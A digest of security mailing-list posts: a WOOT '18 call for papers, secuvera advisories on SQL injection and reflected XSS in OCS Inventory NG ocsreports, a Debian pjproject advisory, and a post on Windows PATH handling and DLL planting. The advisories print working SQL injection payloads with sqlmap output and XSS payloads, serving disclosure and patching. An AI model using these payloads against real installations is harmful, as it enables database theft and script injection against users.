Call for Papers: USENIX Workshop on Offensive Technologies (WOOT '18)

[Yves Younan]

Dear all,

We are pleased to announce the Call for Papers for the 12th USENIX
Workshop on Offensive Technologies! WOOT '18 will be held on August
13–14, 2018, in conjunction with USENIX Security in Baltimore, MD, USA.

WOOT provides a forum for high-quality, peer-reviewed work discussing
tools and techniques for attack. Submissions should reflect the state of
the art in offensive computer security technology, exposing poorly
understood mechanisms, presenting novel attacks, or surveying the state
of offensive operations at scale. WOOT '18 welcomes papers in both an
academic security context and more applied work that informs the field
about the state of security practice in offensive techniques.

Topics of interest include, but are not limited to:

Application security and vulnerability research
Attacks against privacy
Attacks on virtualization and the cloud
Browser and general client-side security
Hardware attacks
Internet of Things
Malware design, implementation, and analysis
Network and distributed systems attacks
Offensive applications of formal methods
Offensive aspects of mobile security
Offensive technologies using (or against) machine learning
Operating systems security
Practical attacks on deployed cryptographic systems

Paper submissions are due by Wednesday, May 30, 2018. Please read
through the complete Call for Papers for additional details and
instructions: https://www.usenix.org/conference/woot18/call-for-papers

We look forward to receiving your submissions!

Christian Rossow, CISPA
Yves Younan, Cisco Talos
WOOT '18 Program Co-Chairs

secuvera-SA-2017-04: SQL-Injection Vulnerability in OCS Inventory NG ocsreports Web application

[Simon Bieber]

Affected Products
   OCS Inventory NG ocsreports 2.4
   OCS Inventory NG ocsreports 2.3.1
   (older/other releases have not been tested)
References
   https://www.secuvera.de/advisories/secuvera-SA-2017-04.txt (used for updates)
   
https://www.ocsinventory-ng.org/en/ocs-inventory-server-2-4-1-has-been-released/
 (Release announcement of OCS Inventory 2.4.1)

Summary:
   Open Computer and Software Inventory Next Generation (OCS inventory NG) is 
free software that 
   enables users to inventory IT assets. (Source: Wikipedia)
   OCS Reports for OCS Inventory is a web application to manage the OCS 
Inventory Server and Clients. 
   The web application is prone to SQL injection (SQLi) attacks.

Effect:
   An authenticated attacker is able to gain full access to data stored within 
database.

Vulnerable Scripts:
   1) index.php: Function "visu_search" ("Search with various criteria") 
GET-parameter "value"
   2) ajax.php: Function "visu_groups" POST-parameter 
"columns%5B0%5D%5Bname%5D" ("columns[0][name]" not url-encoded style for better 
reading)
   
Examples:
   1) The following request of an authenticated readonly user was used in 
conjunction with sqlmap to exploit the issue:
   GET /index.php?function=visu_search=allsoft=somesoft HTTP/1.1
   Host: 
   Cookie: PHPSESSID=; VERS=7011; Connection: close
   
   SQLMap Output:
   sqlmap identified the following injection point(s) with a total of 232 
HTTP(s) requests:
   ---
   Parameter: value (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: function=visu_search=allsoft=somesoft' AND 6455=6455 
AND 'Ymqk'='Ymqk

   Type: AND/OR time-based blind 
   Title: MySQL >= 5.0.12 AND time-based blind
   Payload: function=visu_search=allsoft=somesoft' AND SLEEP(5) 
AND 'LhKg'='LhKg
   ---

   
   2)
   POST /ajax.php?function=visu_groups_header=true_footer=true HTTP/1.1
   Host: 
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 1434
   Cookie: PHPSESSID=; VERS=7011;
   Connection: close

   
draw=4%5B0%5D%5Bdata%5D=NAME%5B0%5D%5Bname%5D=h.NAME%5B0%5D%5Bsearchable%5D=true&\
   
columns%5B0%5D%5Borderable%5D=true%5B0%5D%5Bsearch%5D%5Bvalue%5D=%5B0%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B1%5D%5Bdata%5D=ID%5B1%5D%5Bname%5D=h.ID%5B1%5D%5Bsearchable%5D=true&\
   
columns%5B1%5D%5Borderable%5D=true%5B1%5D%5Bsearch%5D%5Bvalue%5D=%5B1%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B2%5D%5Bdata%5D=DESCRIPTION%5B2%5D%5Bname%5D=h.DESCRIPTION%5B2%5D%5Bsearchable%5D=true&\
   
columns%5B2%5D%5Borderable%5D=true%5B2%5D%5Bsearch%5D%5Bvalue%5D=%5B2%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B3%5D%5Bdata%5D=LASTDATE%5B3%5D%5Bname%5D=h.LASTDATE%5B3%5D%5Bsearchable%5D=true&\
   
columns%5B3%5D%5Borderable%5D=true%5B3%5D%5Bsearch%5D%5Bvalue%5D=%5B3%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B4%5D%5Bdata%5D=NBRE%5B4%5D%5Bname%5D=NBRE%5B4%5D%5Bsearchable%5D=false%5B4%5D%5Borderable%5D=false&\
   
columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=%5B4%5D%5Bsearch%5D%5Bregex%5D=false%5B0%5D%5Bcolumn%5D=0%5B0%5D%5Bdir%5D=asc&\
   
start=0=10%5Bvalue%5D=PENTESTME%5Bregex%5D=false_85=8cfd903726e71489fd6afc44e9f3bfc002b598e0_COL==&\
   
LANG=_CHECK==STAT_col%5B%5D=0_col%5B%5D=1_col%5B%5D=2_col%5B%5D=3_col%5B%5D=4%5B%5D=&\
   

   SQLMap Output:
   sqlmap identified the following injection point(s) with a total of 232 
HTTP(s) requests:
   ---
   Parameter: columns%5B0%5D%5Bname%5D (POST)
   Type: AND/OR time-based blind 
   Title: MySQL >= 5.0.12 AND time-based blind
   Payload: 
draw=4%5B0%5D%5Bdata%5D=NAME%5B0%5D%5Bname%5D=h.NAME' AND 
SLEEP(5) AND 'LhKg'='LhKg%5B0%5D%5Bsearchable%5D=true&\
   
columns%5B0%5D%5Borderable%5D=true%5B0%5D%5Bsearch%5D%5Bvalue%5D=%5B0%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B1%5D%5Bdata%5D=ID%5B1%5D%5Bname%5D=h.ID%5B1%5D%5Bsearchable%5D=true&\
   
columns%5B1%5D%5Borderable%5D=true%5B1%5D%5Bsearch%5D%5Bvalue%5D=%5B1%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B2%5D%5Bdata%5D=DESCRIPTION%5B2%5D%5Bname%5D=h.DESCRIPTION%5B2%5D%5Bsearchable%5D=true&\
   
columns%5B2%5D%5Borderable%5D=true%5B2%5D%5Bsearch%5D%5Bvalue%5D=%5B2%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B3%5D%5Bdata%5D=LASTDATE%5B3%5D%5Bname%5D=h.LASTDATE%5B3%5D%5Bsearchable%5D=true&\
   
columns%5B3%5D%5Borderable%5D=true%5B3%5D%5Bsearch%5D%5Bvalue%5D=%5B3%5D%5Bsearch%5D%5Bregex%5D=false&\
   
columns%5B4%5D%5Bdata%5D=NBRE%5B4%5D%5Bname%5D=NBRE%5B4%5D%5Bsearchable%5D=false%5B4%5D%5Borderable%5D=false&\
   
columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=%5B4%5D%5Bsearch%5D%5Bregex%5D=false%5B0%5D%5Bcolumn%5D=0%5B0%5D%5Bdir%5D=asc&\
   
start=0=10%5Bvalue%5D=PENTESTME%5Bregex%5D=false_85=8cfd903726e71489fd6afc44e9f3bfc002b598e0_COL==&\
   
LANG=_CHECK==STAT_col%5B%5D=0_col%5B%5D=1_col%5B%5D=2_col%5B%5D=3_col%5B%5D=4%5B%5D=&\
   
   ---
   
Solution:
   Install OCS Inventory Release 2.4.1 or newer. 

Disclosure Timeline:
   2017/12/15 

[SECURITY] [DSA 4170-1] pjproject security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4170-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
April 09, 2018https://www.debian.org/security/faq
- -

Package: pjproject
CVE ID : CVE-2017-16872 CVE-2017-16875 CVE-2018-198
 CVE-2018-199

Multiple vulnerabilities have been discovered in the PJSIP/PJProject
multimedia communication which may result in denial of service during
the processing of SIP and SDP messages and ioqueue keys.

For the stable distribution (stretch), these problems have been fixed in
version 2.5.5~dfsg-6+deb9u1.

We recommend that you upgrade your pjproject packages.

For the detailed security status of pjproject please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/pjproject

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlrL0/0ACgkQEMKTtsN8
Tjb24Q//Tf+mgNJCFCH34I3wEO59joHw6/pytj587BrFiC6tE91ueYf2gMvoFyGM
9t3o1XMKxox2AQdoDkLJ5AHRGWm2rfgpe0Udog/W9deAG/U6eISTs7roisB58O58
iQ32rHPCBUyqxvPC8fks3BXiBUDbNoRiYiXTpqzfN/Rj3T0s33HCeHgq/LJVM4f9
cbM70HlG3Nb6LRmtXkSUTOv0enblHy/Hi98YfO4xR02bY1bnQLePWPG2bcC0rpWs
c9DxboRsh949yCH+5YK/4XiW1zX96SFlriX+uB6OiiWfzvdl/O5iUDa1Ccf8BorM
lANbeMuhfpTYfMIKP2/MkDCUJpMqZQ53VTX0GYCD4QDd4olyNpvdXNzyg53GIeBW
y1SAeF3J4ygURQQKbLARbStLGWEuW5f8b8lu9Cp1dtS/iwFlHFEUAB+m8jDqtI9k
q4hDLgtaR3c9x+XNH63EgVrga7fHQ332sDfh4o6vItsfs1FjtPeM89kbq4Fh8PnE
GJXFmggtuXpezhrgPrUnJwhzkbxRpd804ulY464izTJRTMIUvv7CcRH31Kn58DwC
Mt8417Lgi0jEDMCEYCOZjXL62EOM84qTHpWHZ4sFsubIzf1DZY6mW7Yghz1LzqLm
7+k9DG+9etDaNvxrM5nkfaeMbpedVSymqikqC6a2/tP8xDBp38k=
=wjk0
-END PGP SIGNATURE-

Defense in depth -- the Microsoft way (part 53): our MSRC doesn't know how Windows handles PATH

[Stefan Kanthak]

Hi @ll,

on their "Security Research & Defense" blog, members of Microsoft's
Security Response Center recently posted 


This blog post but clearly shows that the MSRC doesn't know how Windows
handles the PATH!

Error #1


| The directories that are in the PATH environment variable are always
| admin ACLed and a normal user can't modify contents of these directories.
...
| What Microsoft won't address (not a vulnerability)
| PATH directory scenarios - Since there can't be a non-admin directory in
| the PATH this can't be exploited.

OUCH!

The user can modify the PATH environment variable as s/he likes and add
arbitrary directories!

1) Start a command prompt, then run the following commands:

   MKDIR "%SystemDrive%\fubar"
   PATH %SystemDrive%\fubar;%PATH%
   START %ComSpec% /K PATH


2) The PATH environment variable is built during user logon from the
   system's PATH, stored in the registry entry
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session 
Manager\Environment]
  
"PATH"=expand:"%SystemRoot%\\System32;%SystemRoot%;%SystemRoot%\\System32\\WBEM;..."
   plus the user's PATH, stored in the registry entry
  [HKEY_CURRENT_USER\Environment]
  "PATH"=expand:";..."

   To add one or more arbitrary user-controlled directories to this
   persistent PATH, set the latter registry entry, for example via
   control panel.
   When a user does this, control panel broadcasts a WM_SETTINGCHANGE
   to all applications.
   Especially Windows' File Explorer (the "shell") rebuilds the PATH
   environment variable upon receiving this broadcast!


3) To add one or more arbitrary user-controlled directories to an
   applications  PATH, create the registry entry
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App 
Paths\]
  "PATH"=";..."

   See 


Error #2


| 6. The directories that are listed in the PATH environment variable.
|Note that this does not include the per-application path specified
|by the App Paths registry key. The App Paths key is not used when
|computing the DLL search path.

OUCH!

The per-application path stored beneath the "App Paths" registry key is
prepended (NT 5.x and below) or appended (NT 6.x and above) to the PATH
environment variable when an application is started via one of the
ShellExecute*() functions.


Error #3


| DLL planting issues that fall into the category of PATH directories
| DLL planting are treated as won't fix.

OUCH!

The MSRC also ignores the fact that
CHDIR ""
START 
is equivalent to adding "" in front of the PATH!

JFTR: loading of DLLs from the CWD can be disabled via
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"CWDIllegalInDllSearch"=dword:
  (see )


stay tuned
Stefan Kanthak

secuvera-SA-2017-03: Reflected Cross-Site-Scripting Vulnerabilities in OCS Inventory NG ocsreports Web application

[Simon Bieber]

Affected Products
   OCSInventory-ocsreports 2.4
   (older releases have not been tested) 
References
   https://www.secuvera.de/advisories/secuvera-SA-2017-03.txt (used for updates)
   
https://www.ocsinventory-ng.org/en/ocs-inventory-server-2-4-1-has-been-released/
 (Release announcement of OCS Inventory 2.4.1)

Summary:
   Open Computer and Software Inventory Next Generation (OCS inventory NG) is 
free software that enables users to inventory IT assets. (Source: Wikipedia)
   OCS Reports for OCS Inventory is a web application to manage the OCS 
Inventory Server and Clients. 
   The web application is prone to reflected Cross-Site-Scripting (XSS) attacks.

Effect:
   An attacker is able to execute arbitrary (javascript) code within a victims' 
browser by luring a victim to click on a link containing malicious code 
   

Vulnerable Scripts:
   1) anonymous: USERID and Password field of login page are vulnerable
   2) logged in user: index.php: arbitrary supplied URL parameters will get 
included within a javascript block. 
   3) logged in user: index.php: parameter "prov" will get included within a 
hidden page form field
   
Examples:
   1) Enter the following payload into login form: " onload="alert(42);
   2) 
http:///index.php?function=visu_search=allsoft=somesoftware%'-alert(1)-'js9gz=1
   3) 
http:///index.php?function=visu_search=allsoftfrsk4'accesskey%3d'x'onclick%3d'alert(1)'%2f%2fqqy1d=

Solution:
   Install OCS Inventory Release 2.4.1 or newer. 
   
Disclosure Timeline:
   2017/12/15 vendor contacted, asked for security contact information
   2018/01/02 contacted vendor again after no answer was received so far
   2018/01/02 response of responsible contact 
   2018/01/22 Sent technical details
   2018/02/12 Developer replied proposing fix
   2018/03/28 Developer contacted us to announce the upcoming release
   2018/04/05 OCS Version 2.4.1 was released
   2018/08/09 Release of the security advisory
   
Credits
   Simon Bieber, secuvera GmbH
   sbie...@secuvera.de
   https://www.secuvera.de

Thanks to:
   Michael Hermann, secuvera GmbH 
   for his support!
   Gilles Dubois and Damien Belliard, factorfx
   for fixing this issue!

Disclaimer:
   All information is provided without warranty. The intent is to provide 
informa-
   tion to secure infrastructure and/or systems, not to be able to attack or 
damage.
   Therefore secuvera shall not be liable for any direct or indirect damages 
that 
   might be caused by using this information.